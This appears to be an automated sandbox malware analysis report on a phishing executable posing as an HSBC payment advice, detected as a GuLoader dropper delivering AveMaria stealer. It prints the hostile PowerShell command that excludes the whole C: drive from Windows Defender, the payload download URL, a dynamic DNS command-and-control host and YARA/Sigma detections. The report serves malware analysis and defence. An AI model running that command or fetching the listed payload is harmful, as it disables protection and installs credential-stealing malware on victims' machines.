Loading ...

Play interactive tourEdit tour

Windows Analysis Report HSBC Payment Advice.exe

Overview

General Information

Sample Name:HSBC Payment Advice.exe
Analysis ID:528768
MD5:a069e61b357f625a7b3595150412c42d
SHA1:5fa560d04b13db7e0216bda2ca5f1c3b94a8912e
SHA256:0fb47a47bc025991b3ed8895aa84030def6e5cc538a9cec279a73f4528d549c6
Tags:exeHSBCsigned
Infos:

Most interesting Screenshot:

Detection

GuLoader AveMaria UACMe
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Potential malicious icon found
Yara detected Generic Dropper
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected UACMe UAC Bypass tool
Yara detected AveMaria stealer
GuLoader behavior detected
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Yara detected GuLoader
Hides threads from debuggers
Initial sample is a PE file and has a suspicious name
Tries to detect Any.run
Increases the number of concurrent connection per server for Internet Explorer
Yara detected VB6 Downloader Generic
Contains functionality to hide user accounts
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for sample
Sigma detected: Powershell Defender Exclusion
Machine Learning detection for dropped file
Executable has a suspicious name (potential lure to open the executable)
C2 URLs / IPs found in malware configuration
Adds a directory exclusion to Windows Defender
Hides that the sample has been downloaded from the Internet (zone.identifier)
Uses dynamic DNS services
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Drops PE files to the application program directory (C:\ProgramData)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Abnormal high CPU Usage
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Installs a raw input device (often for capturing keystrokes)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
PE / OLE file has an invalid certificate
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • HSBC Payment Advice.exe (PID: 6196 cmdline: "C:\Users\user\Desktop\HSBC Payment Advice.exe" MD5: A069E61B357F625A7B3595150412C42D)
    • HSBC Payment Advice.exe (PID: 5816 cmdline: "C:\Users\user\Desktop\HSBC Payment Advice.exe" MD5: A069E61B357F625A7B3595150412C42D)
      • powershell.exe (PID: 7140 cmdline: powershell Add-MpPreference -ExclusionPath C:\ MD5: DBA3E6449E97D4E3DF64527EF7012A10)
        • conhost.exe (PID: 7068 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • images.exe (PID: 6136 cmdline: C:\ProgramData\images.exe MD5: A069E61B357F625A7B3595150412C42D)
        • images.exe (PID: 5216 cmdline: C:\ProgramData\images.exe MD5: A069E61B357F625A7B3595150412C42D)
  • cleanup

Malware Configuration

Threatname: GuLoader

{"Payload URL": "https://spuredge.com/warzone_JBBOxCEy72.bin"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000015.00000002.653463749.0000000000650000.00000040.00000001.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
    0000000C.00000003.501661289.0000000001B82000.00000004.00000001.sdmpCodoso_Gh0st_1Detects Codoso APT Gh0st MalwareFlorian Roth
    • 0x1cc30:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
    • 0x1cc30:$c1: Elevation:Administrator!new:
    0000000C.00000003.501661289.0000000001B82000.00000004.00000001.sdmpJoeSecurity_UACMeYara detected UACMe UAC Bypass toolJoe Security
      0000000C.00000003.501661289.0000000001B82000.00000004.00000001.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        0000000C.00000003.501661289.0000000001B82000.00000004.00000001.sdmpJoeSecurity_AveMariaYara detected AveMaria stealerJoe Security
          Click to see the 18 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          12.3.HSBC Payment Advice.exe.1b9deb0.6.raw.unpackCodoso_Gh0st_2Detects Codoso APT Gh0st MalwareFlorian Roth
          • 0xd80:$s13: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
          12.3.HSBC Payment Advice.exe.1b9deb0.6.raw.unpackCodoso_Gh0st_1Detects Codoso APT Gh0st MalwareFlorian Roth
          • 0xd80:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
          • 0xd80:$c1: Elevation:Administrator!new:
          12.3.HSBC Payment Advice.exe.1b9deb0.6.raw.unpackJoeSecurity_UACMeYara detected UACMe UAC Bypass toolJoe Security
            12.3.HSBC Payment Advice.exe.1b2fab0.9.raw.unpackJoeSecurity_AveMariaYara detected AveMaria stealerJoe Security
              12.3.HSBC Payment Advice.exe.1b9deb0.1.raw.unpackCodoso_Gh0st_2Detects Codoso APT Gh0st MalwareFlorian Roth
              • 0xd80:$s13: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
              Click to see the 11 entries

              Sigma Overview

              System Summary:

              barindex
              Sigma detected: Powershell Defender ExclusionShow sources
              Source: Process startedAuthor: Florian Roth: Data: Command: powershell Add-MpPreference -ExclusionPath C:\, CommandLine: powershell Add-MpPreference -ExclusionPath C:\, CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\HSBC Payment Advice.exe" , ParentImage: C:\Users\user\Desktop\HSBC Payment Advice.exe, ParentProcessId: 5816, ProcessCommandLine: powershell Add-MpPreference -ExclusionPath C:\, ProcessId: 7140
              Sigma detected: Non Interactive PowerShellShow sources
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell Add-MpPreference -ExclusionPath C:\, CommandLine: powershell Add-MpPreference -ExclusionPath C:\, CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\HSBC Payment Advice.exe" , ParentImage: C:\Users\user\Desktop\HSBC Payment Advice.exe, ParentProcessId: 5816, ProcessCommandLine: powershell Add-MpPreference -ExclusionPath C:\, ProcessId: 7140
              Sigma detected: T1086 PowerShell ExecutionShow sources
              Source: Pipe createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: PipeName: \PSHost.132823686502527122.7140.DefaultAppDomain.powershell

              Jbx Signature Overview

              Click to jump to signature section

              Show All Signature Results

              AV Detection:

              barindex
              Found malware configurationShow sources
              Source: 00000015.00000002.653463749.0000000000650000.00000040.00000001.sdmpMalware Configuration Extractor: GuLoader {"Payload URL": "https://spuredge.com/warzone_JBBOxCEy72.bin"}
              Multi AV Scanner detection for submitted fileShow sources
              Source: HSBC Payment Advice.exeVirustotal: Detection: 56%Perma Link
              Source: HSBC Payment Advice.exeMetadefender: Detection: 20%Perma Link
              Source: HSBC Payment Advice.exeReversingLabs: Detection: 48%
              Yara detected AveMaria stealerShow sources
              Source: Yara matchFile source: 12.3.HSBC Payment Advice.exe.1b2fab0.9.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0000000C.00000003.501661289.0000000001B82000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000003.501830752.0000000001B99000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000003.501858409.0000000001B2F000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000003.501798969.0000000001B99000.00000004.00000001.sdmp, type: MEMORY
              Multi AV Scanner detection for domain / URLShow sources
              Source: spuredge.comVirustotal: Detection: 11%Perma Link
              Multi AV Scanner detection for dropped fileShow sources
              Source: C:\ProgramData\images.exeVirustotal: Detection: 56%Perma Link
              Source: C:\ProgramData\images.exeMetadefender: Detection: 20%Perma Link
              Source: C:\ProgramData\images.exeReversingLabs: Detection: 48%
              Machine Learning detection for sampleShow sources
              Source: HSBC Payment Advice.exeJoe Sandbox ML: detected
              Machine Learning detection for dropped fileShow sources
              Source: C:\ProgramData\images.exeJoe Sandbox ML: detected
              Source: 12.0.HSBC Payment Advice.exe.400000.1.unpackAvira: Label: TR/Dropper.VB.Gen
              Source: 12.0.HSBC Payment Advice.exe.400000.3.unpackAvira: Label: TR/Dropper.VB.Gen
              Source: 28.0.images.exe.400000.0.unpackAvira: Label: TR/Dropper.VB.Gen
              Source: 12.0.HSBC Payment Advice.exe.400000.0.unpackAvira: Label: TR/Dropper.VB.Gen
              Source: 28.0.images.exe.400000.1.unpackAvira: Label: TR/Dropper.VB.Gen
              Source: 0.0.HSBC Payment Advice.exe.400000.0.unpackAvira: Label: TR/Dropper.VB.Gen
              Source: 21.2.images.exe.400000.0.unpackAvira: Label: TR/Dropper.VB.Gen
              Source: 21.0.images.exe.400000.0.unpackAvira: Label: TR/Dropper.VB.Gen
              Source: 0.2.HSBC Payment Advice.exe.400000.0.unpackAvira: Label: TR/Dropper.VB.Gen
              Source: 12.0.HSBC Payment Advice.exe.400000.2.unpackAvira: Label: TR/Dropper.VB.Gen
              Source: 28.0.images.exe.400000.2.unpackAvira: Label: TR/Dropper.VB.Gen
              Source: 28.0.images.exe.400000.3.unpackAvira: Label: TR/Dropper.VB.Gen

              Exploits:

              barindex
              Yara detected UACMe UAC Bypass toolShow sources
              Source: Yara matchFile source: 12.3.HSBC Payment Advice.exe.1b9deb0.6.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 12.3.HSBC Payment Advice.exe.1b9deb0.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 12.3.HSBC Payment Advice.exe.1b9deb0.7.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 12.3.HSBC Payment Advice.exe.1b316a8.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 12.3.HSBC Payment Advice.exe.1b30110.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0000000C.00000003.501661289.0000000001B82000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000003.501830752.0000000001B99000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000003.501798969.0000000001B99000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000003.501711876.0000000001B2F000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: HSBC Payment Advice.exe PID: 5816, type: MEMORYSTR
              Source: HSBC Payment Advice.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
              Source: unknownHTTPS traffic detected: 38.103.244.107:443 -> 192.168.2.7:49784 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 38.103.244.107:443 -> 192.168.2.7:49823 version: TLS 1.2
              Source: C:\Users\user\Desktop\HSBC Payment Advice.exeDirectory created: C:\Program Files\Microsoft DN1Jump to behavior

              Networking:

              barindex
              C2 URLs / IPs found in malware configurationShow sources
              Source: Malware configuration extractorURLs: https://spuredge.com/warzone_JBBOxCEy72.bin
              Uses dynamic DNS servicesShow sources
              Source: unknownDNS query: name: barr2.ddns.net
              Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
              Source: global trafficHTTP traffic detected: GET /warzone_JBBOxCEy72.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: spuredge.comCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /warzone_JBBOxCEy72.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: spuredge.comCache-Control: no-cache
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
              Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49823
              Source: HSBC Payment Advice.exe, images.exe.12.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
              Source: HSBC Payment Advice.exe, images.exe.12.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
              Source: HSBC Payment Advice.exe, 0000000C.00000003.502726009.0000000001B35000.00000004.00000001.sdmp, HSBC Payment Advice.exe, 0000000C.00000003.501873155.0000000001B34000.00000004.00000001.sdmp, HSBC Payment Advice.exe, 0000000C.00000003.498183760.0000000001B36000.00000004.00000001.sdmp, HSBC Payment Advice.exe, 0000000C.00000002.509729103.0000000001B35000.00000004.00000020.sdmp, HSBC Payment Advice.exe, 0000000C.00000003.498385567.0000000001B36000.00000004.00000001.sdmp, HSBC Payment Advice.exe, 0000000C.00000003.501711876.0000000001B2F000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
              Source: HSBC Payment Advice.exe, images.exe.12.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
              Source: HSBC Payment Advice.exe, images.exe.12.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
              Source: HSBC Payment Advice.exe, images.exe.12.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
              Source: HSBC Payment Advice.exe, images.exe.12.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
              Source: HSBC Payment Advice.exe, images.exe.12.drString found in binary or memory: http://ocsp.digicert.com0C
              Source: HSBC Payment Advice.exe, images.exe.12.drString found in binary or memory: http://ocsp.digicert.com0O
              Source: HSBC Payment Advice.exe, images.exe.12.drString found in binary or memory: http://www.digicert.com/CPS0
              Source: HSBC Payment Advice.exe, 0000000C.00000003.501661289.0000000001B82000.00000004.00000001.sdmp, HSBC Payment Advice.exe, 0000000C.00000003.501830752.0000000001B99000.00000004.00000001.sdmp, HSBC Payment Advice.exe, 0000000C.00000003.501858409.0000000001B2F000.00000004.00000001.sdmp, HSBC Payment Advice.exe, 0000000C.00000003.501798969.0000000001B99000.00000004.00000001.sdmpString found in binary or memory: https://github.com/syohex/java-simple-mine-sweeperC:
              Source: HSBC Payment Advice.exe, 0000000C.00000002.510641709.00000000033E0000.00000004.00000001.sdmpString found in binary or memory: https://spuredge.com/warzone_JBBOxCEy72.bin
              Source: HSBC Payment Advice.exe, images.exe.12.drString found in binary or memory: https://www.digicert.com/CPS0
              Source: unknownDNS traffic detected: queries for: spuredge.com
              Source: global trafficHTTP traffic detected: GET /warzone_JBBOxCEy72.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: spuredge.comCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /warzone_JBBOxCEy72.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: spuredge.comCache-Control: no-cache
              Source: unknownHTTPS traffic detected: 38.103.244.107:443 -> 192.168.2.7:49784 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 38.103.244.107:443 -> 192.168.2.7:49823 version: TLS 1.2
              Source: HSBC Payment Advice.exe, 0000000C.00000003.501661289.0000000001B82000.00000004.00000001.sdmpBinary or memory string: GetRawInputData

              E-Banking Fraud:

              barindex
              Yara detected AveMaria stealerShow sources
              Source: Yara matchFile source: 12.3.HSBC Payment Advice.exe.1b2fab0.9.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0000000C.00000003.501661289.0000000001B82000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000003.501830752.0000000001B99000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000003.501858409.0000000001B2F000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000003.501798969.0000000001B99000.00000004.00000001.sdmp, type: MEMORY

              System Summary:

              barindex
              Potential malicious icon foundShow sources
              Source: initial sampleIcon embedded in PE file: bad icon match: 20047c7c70f0e004
              Malicious sample detected (through community Yara rule)Show sources
              Source: 12.3.HSBC Payment Advice.exe.1b9deb0.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
              Source: 12.3.HSBC Payment Advice.exe.1b9deb0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
              Source: 12.3.HSBC Payment Advice.exe.1b9deb0.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
              Source: 12.3.HSBC Payment Advice.exe.1b316a8.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
              Source: 12.3.HSBC Payment Advice.exe.1b30110.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
              Source: 0000000C.00000003.502703616.0000000001B6F000.00000004.00000001.sdmp, type: MEMORYMatched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
              Initial sample is a PE file and has a suspicious nameShow sources
              Source: initial sampleStatic PE information: Filename: HSBC Payment Advice.exe
              Executable has a suspicious name (potential lure to open the executable)Show sources
              Source: HSBC Payment Advice.exeStatic file information: Suspicious name
              Source: HSBC Payment Advice.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
              Source: 12.3.HSBC Payment Advice.exe.1b9deb0.6.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
              Source: 12.3.HSBC Payment Advice.exe.1b9deb0.6.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
              Source: 12.3.HSBC Payment Advice.exe.1b9deb0.1.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
              Source: 12.3.HSBC Payment Advice.exe.1b9deb0.1.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
              Source: 12.3.HSBC Payment Advice.exe.1b9deb0.7.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
              Source: 12.3.HSBC Payment Advice.exe.1b9deb0.7.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
              Source: 12.3.HSBC Payment Advice.exe.1b316a8.3.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
              Source: 12.3.HSBC Payment Advice.exe.1b316a8.3.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
              Source: 12.3.HSBC Payment Advice.exe.1b30110.2.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
              Source: 12.3.HSBC Payment Advice.exe.1b30110.2.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
              Source: 0000000C.00000003.501661289.0000000001B82000.00000004.00000001.sdmp, type: MEMORYMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
              Source: 0000000C.00000003.502703616.0000000001B6F000.00000004.00000001.sdmp, type: MEMORYMatched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
              Source: 0000000C.00000003.501830752.0000000001B99000.00000004.00000001.sdmp, type: MEMORYMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
              Source: 0000000C.00000003.501798969.0000000001B99000.00000004.00000001.sdmp, type: MEMORYMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
              Source: 0000000C.00000003.501711876.0000000001B2F000.00000004.00000001.sdmp, type: MEMORYMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
              Source: C:\Users\user\Desktop\HSBC Payment Advice.exeCode function: 0_2_004011A80_2_004011A8
              Source: C:\ProgramData\images.exeCode function: 28_2_017A95F928_2_017A95F9
              Source: C:\ProgramData\images.exeCode function: 28_2_017A922A28_2_017A922A
              Source: C:\ProgramData\images.exeCode function: 28_2_017A181928_2_017A1819
              Source: C:\ProgramData\images.exeCode function: 28_2_017AF0C828_2_017AF0C8
              Source: C:\ProgramData\images.exeCode function: 28_2_017A037F28_2_017A037F
              Source: C:\ProgramData\images.exeCode function: 28_2_017A575828_2_017A5758
              Source: C:\ProgramData\images.exeCode function: 28_2_017AC71328_2_017AC713
              Source: C:\ProgramData\images.exeCode function: 28_2_017A441528_2_017A4415
              Source: C:\ProgramData\images.exeCode function: 28_2_017A9AD428_2_017A9AD4
              Source: C:\ProgramData\images.exeCode function: 28_2_017A76CA28_2_017A76CA
              Source: C:\ProgramData\images.exeCode function: 28_2_017ADCC328_2_017ADCC3
              Source: C:\ProgramData\images.exeCode function: 28_2_017A948328_2_017A9483
              Source: C:\ProgramData\images.exeCode function: 28_2_017A95F9 NtAllocateVirtualMemory,28_2_017A95F9
              Source: C:\ProgramData\images.exeCode function: 28_2_017AEB88 NtProtectVirtualMemory,28_2_017AEB88
              Source: C:\ProgramData\images.exeProcess Stats: CPU usage > 98%
              Source: C:\Users\user\Desktop\HSBC Payment Advice.exeProcess Stats: CPU usage > 98%
              Source: HSBC Payment Advice.exe, 00000000.00000000.245504475.000000000041B000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameForm_HALVGUDB.exe vs HSBC Payment Advice.exe
              Source: HSBC Payment Advice.exe, 0000000C.00000003.502703616.0000000001B6F000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameForm_HALVGUDB.exe vs HSBC Payment Advice.exe
              Source: HSBC Payment Advice.exe, 0000000C.00000000.376134620.000000000041B000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameForm_HALVGUDB.exe vs HSBC Payment Advice.exe
              Source: HSBC Payment Advice.exe, 0000000C.00000002.517452791.000000001F0E0000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameForm_HALVGUDB.exe vs HSBC Payment Advice.exe
              Source: HSBC Payment Advice.exeBinary or memory string: OriginalFilenameForm_HALVGUDB.exe vs HSBC Payment Advice.exe
              Source: HSBC Payment Advice.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
              Source: images.exe.12.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
              Source: HSBC Payment Advice.exeStatic PE information: invalid certificate
              Source: HSBC Payment Advice.exeVirustotal: Detection: 56%
              Source: HSBC Payment Advice.exeMetadefender: Detection: 20%
              Source: HSBC Payment Advice.exeReversingLabs: Detection: 48%
              Source: C:\Users\user\Desktop\HSBC Payment Advice.exeFile read: C:\Users\user\Desktop\HSBC Payment Advice.exeJump to behavior
